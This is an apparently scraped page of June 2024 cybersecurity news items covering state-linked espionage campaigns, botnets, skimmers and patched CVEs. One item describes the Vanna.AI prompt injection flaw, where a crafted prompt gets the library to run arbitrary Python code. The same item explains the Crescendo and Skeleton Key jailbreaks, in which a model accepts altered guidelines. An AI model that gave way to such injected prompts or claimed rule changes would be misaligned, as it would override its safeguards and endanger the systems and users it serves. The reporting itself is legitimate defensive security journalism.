The exact mode of initial access associated with the newly discovered activity is currently unclear, although the group is known to leverage spear-phishing and social engineering attacks to activate the infection chain.
H January(68) February(106) March(112) April(110) June(37) July(4)
Kimsuky Using TRANSLATEXT Chrome Extension to Steal Sensitive Data
29.6.24
APT
The Hacker News
The North Korea-linked threat actor known as Kimsuky has been linked to the use
of a new malicious Google Chrome extension that's designed to steal sensitive
information as part of an ongoing intelligence collection effort.
Zscaler ThreatLabz, which observed the activity in early March 2024, has codenamed the extension TRANSLATEXT, highlighting its ability to gather email addresses, usernames, passwords, cookies, and browser screenshots.
The targeted campaign is said to have been directed against South Korean academia, specifically those focused on North Korean political affairs.
Kimsuky is a notorious hacking crew from North Korea
that's known to be active since at least 2012, orchestrating cyber espionage and
financially motivated attacks targeting South Korean entities.
A sister group of the Lazarus cluster and part of the Reconnaissance General
Bureau (RGB), it's also tracked under the names APT43, ARCHIPELAGO, Black
Banshee, Emerald Sleet, Springtail, and Velvet Chollima.
In recent weeks, the group has weaponized a known security flaw in Microsoft Office (CVE-2017-11882) to distribute a keylogger and has used job-themed lures in attacks aimed at aerospace and defense sectors with an aim to drop an espionage tool with data gathering and secondary payload execution functionalities.
"The backdoor, which does not appear to have been publicly documented before, allows the attacker to perform basic reconnaissance and drop additional payloads to take over or remotely control the machine," company CyberArmor said. It has given the campaign the name Niki.
The exact mode of initial access associated with the newly discovered activity
is currently unclear, although the group is known to leverage spear-phishing and
social engineering attacks to activate the infection chain.
The starting point of the attack is a ZIP archive that purports to be about Korean military history and which contains two files: A Hangul Word Processor document and an executable.
Launching the executable results in the retrieval of a PowerShell script from an attacker-controlled server, which, in turn, exports information about the compromised victim to a GitHub repository and downloads additional PowerShell code by means of a Windows shortcut (LNK) file.
Zscaler said it found the GitHub account, created on
February 13, 2024, briefly hosting the TRANSLATEXT extension under the name
"GoogleTranslate.crx," although its delivery method is presently unknown.
"These files were present in the repository on March 7, 2024, and deleted the
next day, implying that Kimsuky intended to minimize exposure and use the
malware for a short period to target specific individuals," security researcher
Seongsu Park said.
TRANSLATEXT, which masquerades as Google Translate, incorporates JavaScript code to bypass security measures for services like Google, Kakao, and Naver; siphon email addresses, credentials, and cookies; capture browser screenshots; and exfiltrate stolen data.
It's also designed to fetch commands from a Blogger Blogspot URL in order to take screenshots of newly opened tabs and delete all cookies from the browser, among others.
"One of the primary objectives of the Kimsuky group is to conduct surveillance on academic and government personnel in order to gather valuable intelligence," Park said.
GitLab Releases Patch for Critical
CI/CD Pipeline Vulnerability and 13 Others
29.6.24
Vulnerebility
The Hacker News
GitLab has released security updates to address 14 security flaws, including one
critical vulnerability that could be exploited to run continuous integration and
continuous deployment (CI/CD) pipelines as any user.
The weaknesses, which affect GitLab Community Edition (CE) and Enterprise Edition (EE), have been addressed in versions 17.1.1, 17.0.3, and 16.11.5.
The most severe of the vulnerabilities is CVE-2024-5655 (CVSS score: 9.6), which could permit a malicious actor to trigger a pipeline as another user under certain circumstances.
It impacts the following versions of CE and EE -
17.1 prior to 17.1.1
17.0 prior to 17.0.3, and
15.8 prior to 16.11.5
GitLab said the fix introduces two breaking changes as a result of which GraphQL
authentication using CI_JOB_TOKEN is disabled by default and pipelines will no
longer run automatically when a merge request is re-targeted after its previous
target branch is merged.
Some of the other important flaws fixed as part of the latest release are listed
below -
CVE-2024-4901 (CVSS score: 8.7) - A stored XSS
vulnerability could be imported from a project with malicious commit notes
CVE-2024-4994 (CVSS score: 8.1) - A CSRF attack on GitLab's GraphQL API leading
to the execution of arbitrary GraphQL mutations
CVE-2024-6323 (CVSS score: 7.5) - An authorization flaw in the global search
feature that allows for leakage of sensitive information from a private
repository within a public project
CVE-2024-2177 (CVSS score: 6.8) - A cross window forgery vulnerability that
enables an attacker to abuse the OAuth authentication flow via a crafted payload
While there is no evidence of active exploitation of the flaws, users are
recommended to apply the patches to mitigate against potential threats.
8220 Gang Exploits Oracle WebLogic Server Flaws for Cryptocurrency Mining
28.6.24
Exploit
The Hacker News
Security researchers have shed more light on the cryptocurrency mining operation
conducted by the 8220 Gang by exploiting known security flaws in the Oracle
WebLogic Server.
"The threat actor employs fileless execution techniques, using DLL reflective and process injection, allowing the malware code to run solely in memory and avoid disk-based detection mechanisms," Trend Micro researchers Ahmed Mohamed Ibrahim, Shubham Singh, and Sunil Bharti said in a new analysis published today.
The cybersecurity firm is tracking the financially motivated actor under the name Water Sigbin, which is known to weaponize vulnerabilities in Oracle WebLogic Server such as CVE-2017-3506, CVE- 2017-10271, and CVE-2023-21839 for initial access and drop the miner payload via multi-stage loading technique.
A successful foothold is followed by the deployment of PowerShell script that's responsible for dropping a first-stage loader ("wireguard2-3.exe") that mimics the legitimate WireGuard VPN application, but, in reality, launches another binary ("cvtres.exe") in memory by means of a DLL ("Zxpus.dll").
Cybersecurity
The injected executable serves as a conduit to load the PureCrypter loader
("Tixrgtluffu.dll") that, in turn, exfiltrates hardware information to a remote
server and creates scheduled tasks to run the miner as well as excludes the
malicious files from Microsoft Defender Antivirus.
In response, the command-and-control (C2) server responds with an encrypted message containing the XMRig configuration details, following which the loader retrieves and executes the miner from an attacker-controlled domain by masquerading it as "AddinProcess.exe," a legitimate Microsoft binary.
The development comes as the QiAnXin XLab team detailed a new installer tool
used by the 8220 Gang called k4spreader since at least February 2024 to deliver
the Tsunami DDoS botnet and the PwnRig mining program.
The malware, which is currently under development and has a shell version, has been leveraging security flaws such as Apache Hadoop YARN, JBoss, and Oracle WebLogic Server to infiltrate susceptible targets.
"k4spreader is written in cgo, including system persistence, downloading and updating itself, and releasing other malware for execution," the company said, adding it's also designed to disable the firewall, terminate rival botnets (e.g., kinsing), and printing operational status.
New SnailLoad Attack Exploits
Network Latency to Spy on Users' Web Activities
28.6.24
Exploit
The Hacker News
A group of security researchers from the Graz University of Technology have
demonstrated a new side-channel attack known as SnailLoad that could be used to
remotely infer a user's web activity.
"SnailLoad exploits a bottleneck present on all Internet connections," the researchers said in a study released this week.
"This bottleneck influences the latency of network packets, allowing an attacker to infer the current network activity on someone else's Internet connection. An attacker can use this information to infer websites a user visits or videos a user watches."
A defining characteristic of the approach is that it obviates the need for carrying out an adversary-in-the-middle (AitM) attack or being in physical proximity to the Wi-Fi connection to sniff network traffic.
Cybersecurity
Specifically, it entails tricking a target into loading a harmless asset (e.g.,
a file, an image, or an ad) from a threat actor-controlled server, which then
exploits the victim's network latency as a side channel to determine online
activities on the victim system.
To perform such a fingerprinting attack and glean what video or a website a user might be watching or visiting, the attacker conducts a series of latency measurements of the victim's network connection as the content is being downloaded from the server while they are browsing or viewing.
It then involves a post-processing phase that employs a convolutional neural network (CNN) trained with traces from an identical network setup to make the inference with an accuracy of up to 98% for videos and 63% for websites.
In other words, due to the network bottleneck on the victim's side, the adversary can deduce the transmitted amount of data by measuring the packet round trip time (RTT). The RTT traces are unique per video and can be used to classify the video watched by the victim.
The attack is so named because the attacking server transmits the file at a snail's pace in order to monitor the connection latency over an extended period of time.
"SnailLoad requires no JavaScript, no form of code execution on the victim system, and no user interaction but only a constant exchange of network packets," the researchers explained, adding it "measures the latency to the victim system and infers the network activity on the victim system from the latency variations."
"The root cause of the side-channel is buffering in a transport path node, typically the last node before the user's modem or router, related to a quality-of-service issue called bufferbloat."
The disclosure comes as academics have disclosed a security flaw in the manner router firmware handles Network Address Translation (NAT) mapping that could be exploited by an attacker connected to the same Wi-Fi network as the victim to bypass built-in randomization in the Transmission Control Protocol (TCP).
Cybersecurity
"Most routers, for performance reasons, do not rigorously inspect the sequence
numbers of TCP packets," the researchers said. "Consequently, this introduces
serious security vulnerabilities that attackers can exploit by crafting forged
reset (RST) packets to maliciously clear NAT mappings in the router."
The attack essentially allows the threat actor to infer the source ports of other client connections as well as steal the sequence number and acknowledgment number of the normal TCP connection between the victim client and the server in order to perform TCP connection manipulation.
The hijacking attacks targeting TCP could then be weaponized to poison a victim's HTTP web page or stage denial-of-service (DoS) attacks, per the researchers, who said patches for the vulnerability are being readied by the OpenWrt community as well as router vendors like 360, Huawei, Linksys, Mercury, TP-Link, Ubiquiti, and Xiaomi.
Researchers Warn of Flaws in Widely Used Industrial Gas Analysis Equipment
28.6.24
Vulnerebility
The Hacker News
Multiple security flaws have been disclosed in Emerson Rosemount gas
chromatographs that could be exploited by malicious actors to obtain sensitive
information, induce a denial-of-service (DoS) condition, and even execute
arbitrary commands.
The flaws impact GC370XA, GC700XA, and GC1500XA and reside in versions 4.1.5 and prior.
According to operational technology (OT) security firm Claroty, the vulnerabilities include two command injection flaws and two separate authentication and authorization vulnerabilities that could be weaponized by unauthenticated attackers to perform a wide range of malicious actions ranging from authentication bypass to command injection.
"Successful exploitation of these vulnerabilities could allow an unauthenticated attacker with network access to run arbitrary commands, access sensitive information, cause a denial-of-service condition, and bypass authentication to acquire admin capabilities," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in an advisory released in January.
Cybersecurity
The chromatograph, which is used for carrying out critical gas measurements, can
be configured and managed by means of a software called MON. The software can
also be used to store critical data and generate reports such as chromatograms,
alarm history, event logs, and maintenance logs.
Claroty's analysis of the firmware and the proprietary protocol used for
communications between the device and the Windows client named MON2020 has
revealed the following shortcomings -
CVE-2023-46687 (CVSS score: 9.8) - An unauthenticated user
with network access could execute arbitrary commands in root context from a
remote computer
CVE-2023-49716 (CVSS score: 6.9) - An authenticated user with network access
could run arbitrary commands from a remote computer
CVE-2023-51761 (CVSS score: 8.3) - An unauthenticated user with network access
could bypass authentication and acquire admin capabilities by resetting the
associated password
CVE-2023-43609 (CVSS score: 6.9) - An unauthenticated user with network access
could obtain access to sensitive information or cause a denial-of-service
condition
Following responsible disclosure, Emerson has released [PDF] an updated version
of the firmware that addresses the vulnerabilities. The company is also
recommending end users to follow cybersecurity best practices and ensure that
the affected products are not directly exposed to the internet.
Cybersecurity
The disclosure comes as Nozomi Networks detailed several flaws in AiLux
RTU62351B that could be abused to access sensitive resources on the device,
alter its configuration, and even achieve execution of arbitrary commands as
root. The vulnerabilities have been collectively dubbed I11USION.
Security flaws have also been identified in Proges Plus temperature monitoring devices and their associated software, namely Sensor Net Connect and Thermoscan IP, that could permit admin privileges over critical medical systems, thereby making it possible for a malicious actor to manipulate system settings, install malware, and exfiltrate data.
These vulnerabilities, which remain unpatched, could also result in a DoS condition of medical monitoring infrastructure, leading to spoilage of temperature-sensitive medicines and vaccines.
TeamViewer Detects Security Breach
in Corporate IT Environment
28.6.24
Incindent
The Hacker News
TeamViewer on Thursday disclosed it detected an "irregularity" in its internal
corporate IT environment on June 26, 2024.
"We immediately activated our response team and procedures, started investigations together with a team of globally renowned cyber security experts and implemented necessary remediation measures," the company said in a statement.
It further noted that its corporate IT environment is completely cut off from the product environment and that there is no evidence to indicate that any customer data has been impacted as a result of the incident.
It did not disclose any details as to who may have been behind the intrusion and how they were able to pull it off, but said an investigation is underway and that it would provide status updates as and when new information becomes available.
Cybersecurity
TeamViewer, based in Germany, is the maker of remote monitoring and management
(RMM) software that allows managed service providers (MSPs) and IT departments
to manage servers, workstations, network devices, and endpoints. It's used by
over 600,000 customers.
Interestingly, the U.S. Health Information Sharing and Analysis Center (Health-ISAC) has issued a bulletin about threat actors' active exploitation of TeamViewer, according to the American Hospital Association (AHA).
"Threat actors have been observed leveraging remote access tools," the non-profit reportedly said. "Teamviewer has been observed being exploited by threat actors associated with APT29."
It's currently unclear at this stage whether this means the attackers are abusing shortcomings in TeamViewer to breach customer networks, using poor security practices to infiltrate targets and deploy the software, or they have carried out an attack on TeamViewer's own systems.
APT29, also called BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard, and The Dukes, is a state-sponsored threat actor affiliated with the Russian Foreign Intelligence Service (SVR). Recently, it was linked to the breaches of Microsoft and Hewlett Packard Enterprise (HPE).
Cybersecurity
Microsoft has since revealed that some customer email inboxes were also accessed
by APT29 following the hack that came to light earlier this year, per reports
from Bloomberg and Reuters.
"This week we are continuing notifications to customers who corresponded with Microsoft corporate email accounts that were exfiltrated by the Midnight Blizzard threat actor," the tech giant was quoted as saying to the news agency.
Rust-Based P2PInfect Botnet Evolves
with Miner and Ransomware Payloads
28.6.24
Ransom
The Hacker News
The peer-to-peer malware botnet known as P2PInfect has been found targeting
misconfigured Redis servers with ransomware and cryptocurrency miners.
The development marks the threat's transition from what appeared to be a dormant botnet with unclear motives to a financially motivated operation.
"With its latest updates to the crypto miner, ransomware payload, and rootkit elements, it demonstrates the malware author's continued efforts into profiting off their illicit access and spreading the network further, as it continues to worm across the internet," Cado Security said in a report published this week.
P2PInfect came to light nearly a year ago, and has since received updates to target MIPS and ARM architectures. Earlier this January, Nozomi Networks uncovered the use of the malware to deliver miner payloads.
It typically spreads by targeting Redis servers and its replication feature to transform victim systems into a follower node of the attacker-controlled server, subsequently allowing the threat actor to issue arbitrary commands to them.
The Rust-based worm also features the ability to scan the internet for more vulnerable servers, not to mention incorporating an SSH password sprayer module that attempts to log in using common passwords.
Cybersecurity
Besides taking steps to prevent other attackers from targeting the same server,
P2PInfect is known to change the passwords of other users, restart the SSH
service with root permissions, and even perform privilege escalation.
"As the name suggests, it is a peer-to-peer botnet, where every infected machine acts as a node in the network, and maintains a connection to several other nodes," security researcher Nate Bill said.
"This results in the botnet forming a huge mesh network, which the malware author makes use of to push out updated binaries across the network, via a gossip mechanism. The author simply needs to notify one peer, and it will inform all its peers and so on until the new binary is fully propagated across the network."
Among the new behavioral changes to P2PInfect include the use of the malware to drop miner and ransomware payloads, the latter of which is designed to encrypt files matching certain file extensions and deliver a ransom note urging the victims to pay 1 XMR (~$165).
"As this is an untargeted and opportunistic attack, it is likely the victims are to be low value, so having a low price is to be expected," Bill pointed out.
Also of note is a new usermode rootkit that makes use of the LD_PRELOAD environment variable to hide their malicious processes and files from security tools, a technique also adopted by other cryptojacking groups like TeamTNT.
It's suspected that P2PInfect is advertised as a botnet-for-hire service, acting as a conduit to deploy other attackers' payloads in exchange for payment.
This theory is bolstered by the fact that the wallet addresses for the miner and ransomware are different, and that the miner process is configured to take up as much processing power as possible, causing it to interfere with the functioning of the ransomware.
"The choice of a ransomware payload for malware primarily targeting a server that stores ephemeral in-memory data is an odd one, and P2Pinfect will likely see far more profit from their miner than their ransomware due to the limited amount of low-value files it can access due to its permission level," Bill said.
"The introduction of the usermode rootkit is a 'good on paper' addition to the malware. If the initial access is Redis, the usermode rootkit will also be completely ineffective as it can only add the preload for the Redis service account, which other users will likely not log in as."
Cybersecurity
The disclosure follows AhnLab Security Intelligence Center's (ASEC) revelations
that vulnerable web servers that have unpatched flaws or are poorly secured are
being targeted by suspected Chinese-speaking threat actors to deploy crypto
miners.
"Remote control is facilitated through installed web shells and NetCat, and given the installation of proxy tools aimed at RDP access, data exfiltration by the threat actors is a distinct possibility," ASEC said, highlighting the use of Behinder, China Chopper, Godzilla, BadPotato, cpolar, and RingQ.
It also comes as Fortinet FortiGuard Labs pointed out that botnets such as UNSTABLE, Condi, and Skibidi are abusing legitimate cloud storage and computing services operators to distribute malware payloads and updates to a broad range of devices.
"Using cloud servers for [command-and-control] operations ensures persistent communication with compromised devices, making it harder for defenders to disrupt an attack," security researchers Cara Lin and Vincent Li said.
Prompt Injection Flaw in Vanna AI Exposes Databases to RCE Attacks
28.6.24
AI
The Hacker News
Cybersecurity researchers have disclosed a high-severity security flaw in the
Vanna.AI library that could be exploited to achieve remote code execution
vulnerability via prompt injection techniques.
The vulnerability, tracked as CVE-2024-5565 (CVSS score: 8.1), relates to a case of prompt injection in the "ask" function that could be exploited to trick the library into executing arbitrary commands, supply chain security firm JFrog said.
Vanna is a Python-based machine learning library that allows users to chat with their SQL database to glean insights by "just asking questions" (aka prompts) that are translated into an equivalent SQL query using a large language model (LLM).
The rapid rollout of generative artificial intelligence (AI) models in recent years has brought to the fore the risks of exploitation by malicious actors, who can weaponize the tools by providing adversarial inputs that bypass the safety mechanisms built into them.
One such prominent class of attacks is prompt injection, which refers to a type of AI jailbreak that can be used to disregard guardrails erected by LLM providers to prevent the production of offensive, harmful, or illegal content, or carry out instructions that violate the intended purpose of the application.
Cybersecurity
Such attacks can be indirect, wherein a system processes data controlled by a
third party (e.g., incoming emails or editable documents) to launch a malicious
payload that leads to an AI jailbreak.
They can also take the form of what's called a many-shot jailbreak or multi-turn jailbreak (aka Crescendo) in which the operator "starts with harmless dialogue and progressively steers the conversation toward the intended, prohibited objective."
This approach can be extended further to pull off another novel jailbreak attack known as Skeleton Key.
"This AI jailbreak technique works by using a multi-turn (or multiple step) strategy to cause a model to ignore its guardrails," Mark Russinovich, chief technology officer of Microsoft Azure, said. "Once guardrails are ignored, a model will not be able to determine malicious or unsanctioned requests from any other."
Skeleton Key is also different from Crescendo in that once the jailbreak is successful and the system rules are changed, the model can create responses to questions that would otherwise be forbidden regardless of the ethical and safety risks involved.
"When the Skeleton Key jailbreak is successful, a model acknowledges that it has updated its guidelines and will subsequently comply with instructions to produce any content, no matter how much it violates its original responsible AI guidelines," Russinovich said.
"Unlike other jailbreaks like Crescendo, where models must be asked about tasks
indirectly or with encodings, Skeleton Key puts the models in a mode where a
user can directly request tasks. Further, the model's output appears to be
completely unfiltered and reveals the extent of a model's knowledge or ability
to produce the requested content."
The latest findings from JFrog – also independently disclosed by Tong Liu – show how prompt injections could have severe impacts, particularly when they are tied to command execution.
CVE-2024-5565 takes advantage of the fact that Vanna facilitates text-to-SQL Generation to create SQL queries, which are then executed and graphically presented to the users using the Plotly graphing library.
This is accomplished by means of an "ask" function – e.g., vn.ask("What are the top 10 customers by sales?") – which is one of the main API endpoints that enables the generation of SQL queries to be run on the database.
Cybersecurity
The aforementioned behavior, coupled with the dynamic generation of the Plotly
code, creates a security hole that allows a threat actor to submit a specially
crafted prompt embedding a command to be executed on the underlying system.
"The Vanna library uses a prompt function to present the user with visualized results, it is possible to alter the prompt using prompt injection and run arbitrary Python code instead of the intended visualization code," JFrog said.
"Specifically, allowing external input to the library's 'ask' method with 'visualize' set to True (default behavior) leads to remote code execution."
Following responsible disclosure, Vanna has issued a hardening guide that warns users that the Plotly integration could be used to generate arbitrary Python code and that users exposing this function should do so in a sandboxed environment.
"This discovery demonstrates that the risks of widespread use of GenAI/LLMs without proper governance and security can have drastic implications for organizations," Shachar Menashe, senior director of security research at JFrog, said in a statement.
"The dangers of prompt injection are still not widely well known, but they are easy to execute. Companies should not rely on pre-prompting as an infallible defense mechanism and should employ more robust mechanisms when interfacing LLMs with critical resources such as databases or dynamic code generation."
Critical SQLi Vulnerability Found in
Fortra FileCatalyst Workflow Application
28.6.24
Vulnerebility
The Hacker News
A critical security flaw has been disclosed in Fortra FileCatalyst Workflow
that, if left unpatched, could allow an attacker to tamper with the application
database.
Tracked as CVE-2024-5276, the vulnerability carries a CVSS score of 9.8. It impacts FileCatalyst Workflow versions 5.1.6 Build 135 and earlier. It has been addressed in version 5.1.6 build 139.
"An SQL injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data," Fortra said in an advisory published Tuesday. "Likely impacts include creation of administrative users and deletion or modification of data in the application database."
It also emphasized that successful unauthenticated exploitation requires a Workflow system with anonymous access enabled. Alternatively, it can also be abused by an authenticated user.
Cybersecurity
Users who cannot apply the patches immediately can disable the vulnerable
servlets – csv_servlet, pdf_servlet, xml_servlet, and json_servlet – in the
"web.xml" file located in the Apache Tomcat installation directory as temporary
workarounds.
Cybersecurity firm Tenable, which reported the flaw on May 22, 2024, has since released a proof-of-concept (PoC) exploit for the flaw.
"A user-supplied jobID is used to form the WHERE clause in an SQL query," it said. "An anonymous remote attacker can perform SQLi via the JOBID parameter in various URL endpoints of the workflow web application."
Exploit Attempts Recorded Against New MOVEit Transfer Vulnerability - Patch
ASAP!
27.6.24
Exploit
The Hacker News
A newly disclosed critical security flaw impacting Progress Software MOVEit
Transfer is already seeing exploitation attempts in the wild shortly after
details of the bug were publicly disclosed.
The vulnerability, tracked as CVE-2024-5806 (CVSS score: 9.1), concerns an authentication bypass that impacts the following versions -
From 2023.0.0 before 2023.0.11
From 2023.1.0 before 2023.1.6, and
From 2024.0.0 before 2024.0.2
"Improper authentication vulnerability in Progress MOVEit Transfer (SFTP module)
can lead to Authentication Bypass," the company said in an advisory released
Tuesday.
Progress has also addressed another critical SFTP-associated authentication
bypass vulnerability (CVE-2024-5805, CVSS score: 9.1) affecting MOVEit Gateway
version 2024.0.0.
Successful exploitation of the flaws could allow attackers to bypass SFTP authentication and gain access to MOVEit Transfer and Gateway systems.
watchTowr Labs has since published additional technical specifics about CVE-2024-5806, with security researchers Aliz Hammond and Sina Kheirkhah noting that it could be weaponized to impersonate any user on the server.
The company further described the flaw as comprising two separate vulnerabilities, one in Progress MOVEit and the other in the IPWorks SSH library.
"While the more devastating vulnerability, the ability to impersonate arbitrary users, is unique to MOVEit, the less impactful (but still very real) forced authentication vulnerability is likely to affect all applications that use the IPWorks SSH server," the researchers said.
Progress Software said the shortcoming in the third-party component "elevates the risk of the original issue" if left unpatched, urging customers to follow the below two steps -
Block public inbound RDP access to MOVEit Transfer
server(s)
Limit outbound access to only known trusted endpoints from MOVEit Transfer
server(s)
According to Rapid7, there are three prerequisites to leveraging CVE-2024-5806:
Attackers need to have knowledge of an existing username, the target account can
authenticate remotely, and the SFTP service is publicly accessible over the
internet.
As of June 25, data gathered by Censys shows that there are around 2,700 MOVEit
Transfer instances online, most of them located in the U.S., the U.K., Germany,
the Netherlands, Canada, Switzerland, Australia, France, Ireland, and Denmark.
With another critical issue in MOVEit Transfer widely abused in a spate of Cl0p ransomware attacks last year (CVE-2023-34362, CVSS score: 9.8), it's essential that users move quickly to update to the latest versions.
The development comes as the U.S. and Infrastructure Security Agency (CISA) revealed that its Chemical Security Assessment Tool (CSAT) was targeted earlier this January by an unknown threat actor by taking advantage of security flaws in the Ivanti Connect Secure (ICS) appliance (CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893).
"This intrusion may have resulted in the potential unauthorized access of Top-Screen surveys, Security Vulnerability Assessments, Site Security Plans, Personnel Surety Program (PSP) submissions, and CSAT user accounts," the agency said, adding it found no evidence of data exfiltration.
Update#
Progress Software, in a statement shared with The Hacker News, said "we have not
received any reports that these vulnerabilities have been exploited and we are
not aware of any direct operational impact to customers."
(The story has been updated after publication to emphasize that the attacks are exploitation attempts at this stage.)
Chinese and N. Korean Hackers Target
Global Infrastructure with Ransomware
27.6.24
APT
The Hacker News
Threat actors with suspected ties to China and North Korea have been linked to
ransomware and data encryption attacks targeting government and critical
infrastructure sectors across the world between 2021 and 2023.
While one cluster of activity has been associated with the ChamelGang (aka CamoFei), the second cluster overlaps with activity previously attributed to Chinese and North Korean state-sponsored groups, firms SentinelOne and Recorded Future said in a joint report shared with The Hacker News.
This includes ChamelGang's attacks aimed at the All India
Institute of Medical Sciences (AIIMS) and the Presidency of Brazil in 2022 using
CatB ransomware, as well as those targeting a government entity in East Asia and
an aviation organization in the Indian subcontinent in 2023.
"Threat actors in the cyber espionage ecosystem are engaging in an increasingly
disturbing trend of using ransomware as a final stage in their operations for
the purposes of financial gain, disruption, distraction, misattribution, or
removal of evidence," security researchers Aleksandar Milenkoski and
Julian-Ferdinand Vögele said.
Ransomware attacks in this context not only serve as an outlet for sabotage but also allow threat actors to cover up their tracks by destroying artifacts that could otherwise alert defenders to their presence.
ChamelGang, first documented by Positive Technologies in 2021, is assessed to be a China-nexus group that operates with motivations as varied as intelligence gathering, data theft, financial gain, denial-of-service (DoS) attacks, and information operations, according to Taiwanese firm TeamT5.
It's known to possess a wide range of tools in its arsenal, including BeaconLoader, Cobalt Strike, backdoors like AukDoor and DoorMe, and a ransomware strain known as CatB, which has been identified as used in attacks targeting Brazil and India based on commonalities in the ransom note, the format of the contact email address, the cryptocurrency wallet address, and the filename extension of encrypted files.
Attacks observed in 2023 have also leveraged an updated version of BeaconLoader to deliver Cobalt Strike for reconnaissance and post-exploitation activities such as dropping additional tooling and exfiltrating NTDS.dit database file.
Furthermore, it's worth pointing out that custom malware put to use by ChamelGang such as DoorMe and MGDrive (whose macOS variant is called Gimmick) have also been linked to other Chinese threat groups like REF2924 and Storm Cloud, once again alluding to the possibility of a "digital quartermaster supplying distinct operational groups with malware."
The other set of intrusions involves the use of Jetico BestCrypt and Microsoft BitLocker in cyber attacks affecting various industry verticals in North America, South America, and Europe. As many as 37 organizations, predominantly the U.S. manufacturing sector, are estimated to have been targeted.
The tactics observed, per the two companies, are
consistent with those attributed to a Chinese hacking crew dubbed APT41 and a
North Korean actor known as Andariel, owing to the presence of tools like the
China Chopper web shell and a backdoor known as DTrack.
"The activities we observed overlap with past intrusions involving artifacts
associated with suspected Chinese and North Korean APT clusters," Milenkoski
told The Hacker News, stating visibility limitations have likely prevented
detecting the malicious artifacts themselves.
"Our investigations and our review of previous research did not reveal evidence of tooling or other intrusion artifacts associated with suspected Chinese or North Korean APT groups being present concurrently in the same targeted environments."
SentinelOne further said it cannot exclude the possibility that these activities are part of a broader cybercriminal scheme, particularly given that nation-state actors have also taken part in financially motivated attacks from time to time.
"Cyber espionage operations disguised as ransomware activities provide an opportunity for adversarial countries to claim plausible deniability by attributing the actions to independent cybercriminal actors rather than state-sponsored entities," the researchers said.
"The use of ransomware by cyber espionage threat groups blurs the lines between cybercrime and cyber espionage, providing adversaries with advantages from both strategic and operational perspectives."
(The story was updated after publication to include a response from SentinelOne.)
Apple Patches AirPods Bluetooth Vulnerability That Could Allow Eavesdropping
27.6.24
OS
The Hacker News
Apple has released a firmware update for AirPods that could allow a malicious
actor to gain access to the headphones in an unauthorized manner.
Tracked as CVE-2024-27867, the authentication issue affects AirPods (2nd generation and later), AirPods Pro (all models), AirPods Max, Powerbeats Pro, and Beats Fit Pro.
"When your headphones are seeking a connection request to one of your previously paired devices, an attacker in Bluetooth range might be able to spoof the intended source device and gain access to your headphones," Apple said in a Tuesday advisory.
In other words, an adversary in physical proximity could exploit the vulnerability to eavesdrop on private conversations. Apple said the issue has been addressed with improved state management.
Jonas Dreßler has been credited with discovering and reporting the flaw. It has been patched as part of AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8.
The development comes two weeks after the iPhone maker
rolled out updates for visionOS (version 1.2) to close out 21 shortcomings,
including seven flaws in the WebKit browser engine.
One of the issues pertains to a logic flaw (CVE-2024-27812) that could result in
a denial-of-service (DoS) when processing web content. The problem has been
fixed with improved file handling, it said.
Security researcher Ryan Pickren, who reported the vulnerability, described it as the "world's first spatial computing hack" that could be weaponized to "bypass all warnings and forcefully fill your room with an arbitrary number of animated 3D objects" sans user interaction.
The vulnerability takes advantage of Apple's failure to apply the permissions model when using the ARKit Quick Look feature to spawn 3D objects in a victim's room. Making matters worse, these animated objects continue to persist even after exiting Safari as they are handled by a separate application.
"Furthermore, it does not even require this anchor tag to have been 'clicked' by the human," Pickren said. "So programmatic JavaScript clicking (i.e., document.querySelector('a').click()) works no problem! This means that we can launch an arbitrary number of 3D, animated, sound-creating, objects without any user interaction whatsoever."
New Credit Card Skimmer Targets
WordPress, Magento, and OpenCart Sites
27.6.24
Crime
The Hacker News
Multiple content management system (CMS) platforms like WordPress, Magento, and
OpenCart have been targeted by a new credit card web skimmer called Caesar
Cipher Skimmer.
A web skimmer refers to malware that is injected into e-commerce sites with the goal of stealing financial and payment information.
According to Sucuri, the latest campaign entails making malicious modifications to the checkout PHP file associated with the WooCommerce plugin for WordPress ("form-checkout.php") to steal credit card details.
"For the past few months, the injections have been changed to look less
suspicious than a long obfuscated script," security researcher Ben Martin said,
noting the malware's attempt to masquerade as Google Analytics and Google Tag
Manager.
Specifically, it utilizes the same substitution mechanism employed in Caesar
cipher to encode the malicious piece of code into a garbled string and conceal
the external domain that's used to host the payload.
It's presumed that all the websites have been previously compromised through other means to stage a PHP script that goes by the names "style.css" and "css.php" in an apparent effort to mimic an HTML style sheet and evade detection.
These scripts, in turn, are designed to load another obfuscated JavaScript code that creates a WebSocket and connects to another server to fetch the actual skimmer.
"The script sends the URL of the current web pages, which allows the attackers to send customized responses for each infected site," Martin pointed out. "Some versions of the second layer script even check if it is loaded by a logged-in WordPress user and modify the response for them."
Some versions of the script have programmer-readable explanations (aka comments) written in Russian, suggesting that the threat actors behind the operation are Russian-speaking.
The form-checkout.php file in WooCommerce is not the only
method used to deploy the skimmer, for the attackers have also been spotted
misusing the legitimate WPCode plugin to inject it into the website database.
On websites that use Magento, the JavaScript injections are performed on
database tables such as core_config_data. It's currently not known how this is
accomplished on OpenCart sites.
Due to its prevalent use as a foundation for websites, WordPress and the larger plugin ecosystem have become a lucrative target for malicious actors, allowing them easy access to a vast attack surface.
It's imperative that site owners keep their CMS software and plugins up-to-date, enforce password hygiene, and periodically audit them for the presence of suspicious administrator accounts.
New Medusa Android Trojan Targets
Banking Users Across 7 Countries
27.6.24
Virus
The Hacker News
researchers have discovered an updated version of an Android banking trojan
called Medusa that has been used to target users in Canada, France, Italy,
Spain, Turkey, the U.K., and the U.S.
The new fraud campaigns, observed in May 2024 and active since July 2023, manifested through five different botnets operated by various affiliates, firm Cleafy said in an analysis published last week.
The new Medusa samples feature a "lightweight permission set and new features, such as the ability to display a full-screen overlay and remotely uninstall applications," security researchers Simone Mattia and Federico Valentini said.
Medusa, also known as TangleBot, is a sophisticated Android malware first
discovered in July 2020 targeting financial entities in Turkey. It comes with
capabilities to read SMS messages, log keystrokes, capture screenshots, record
calls, share the device screen in real-time, and perform unauthorized fund
transfers using overlay attacks to steal banking credentials.
In February 2022, ThreatFabric uncovered Medusa campaigns leveraging similar
delivery mechanisms as that of FluBot (aka Cabassous) by masquerading the
malware as seemingly harmless package delivery and utility apps. It's suspected
that the threat actors behind the Trojan are from Turkey.
